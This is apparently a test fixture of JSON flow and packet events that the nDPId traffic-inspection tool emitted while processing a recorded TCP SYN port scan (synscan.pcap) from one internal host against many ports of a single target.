-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsMnwAACwG6fasEAAIQA2GNIzSA+PdUoMYAAAAAGACBAAwrAAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAs3nEAADAGOgGsEAAIQA2GNIzSAkvdUoMYAAAAAGACBAAyRAAAAgQFtA=="} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAspjUAADYGbD2sEAAIQA2GNIzSADXdUoMYAAAAAGACDAAsWgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxrsAADgGSbesEAAIQA2GNIzSFwzdUoMYAAAAAGACBAAdgwAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1278275056338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsv+0AADcGUYWsEAAIQA2GNIzSABXdUoMYAAAAAGACEAAoegAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056340,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056340,"pkt":"ACYLMQczACWzv5HuCABFAAAsQrAAADsGysKsEAAIQA2GNIzSAHHdUoMYAAAAAGACEAAoHgAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1278275056401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275056401,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABxjNKSwt+J3VKDGVAUAADdegAAAAAAAAAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAstfQAACYGbH6sEAAIQA2GNIzSAFDdUoMYAAAAAGACDAAsPwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056403,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056403,"pkt":"ACYLMQczACWzv5HuCABFAAAsT54AADAGyNSsEAAIQA2GNIzSAIvdUoMYAAAAAGACBAA0BAAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1278275056464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275056464,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACABQjNJ7XAKI3VKDGWASFtCjyQAAAgQFZAAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAsoqsAAC4Gd8esEAAIQA2GNIzSDT3dUoMYAAAAAGACDAAfUgAAAgQFtA=="} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056466,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056466,"pkt":"ACYLMQczACWzv5HuCABFAAAs400AADkGLCWsEAAIQA2GNIzSABfdUoMYAAAAAGACCAAweAAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs0LAAACUGUsKsEAAIQA2GNIzTABfdU4MZAAAAAGACCAAwdQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsjfEAACkGkYGsEAAIQA2GNIzTDT3dU4MZAAAAAGACCAAjTwAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAs40UAADcGLi2sEAAIQA2GNIzTAIvdU4MZAAAAAGACEAAoAQAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057477,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057477,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE8AACgG7COsEAAIQA2GNIzTABXdU4MZAAAAAGACBAA0dwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAskg4AAC4GiGSsEAAIQA2GNIzTFwzdU4MZAAAAAGACDAAVgAAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsh\/MAAC8GkX+sEAAIQA2GNIzTAkvdU4MZAAAAAGACEAAmQQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAscq0AACUGsMWsEAAIQA2GNIzTA+PdU4MZAAAAAGACCAAsqQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsocYAACoGfKysEAAIQA2GNIzTBAHdU4MZAAAAAGACDAAoiwAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0nYAADMGQvysEAAIQA2GNIzTAG\/dU4MZAAAAAGACEAAoHQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs0EcAADoGPiusEAAIQA2GNIzTAMfdU4MZAAAAAGACDAArxQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAs+2cAACwGIQusEAAIQA2GNIzTDOrdU4MZAAAAAGACBAAnogAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsTRAAAC8GzGKsEAAIQA2GNIzTAI\/dU4MZAAAAAGACEAAn\/QAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsDXoAAC0GDfmsEAAIQA2GNIzTAbvdU4MZAAAAAGACCAAu0QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsaUIAACsGtDCsEAAIQA2GNIzSBrvdUoMYAAAAAGACEAAh1AAAAgQFtA=="} 
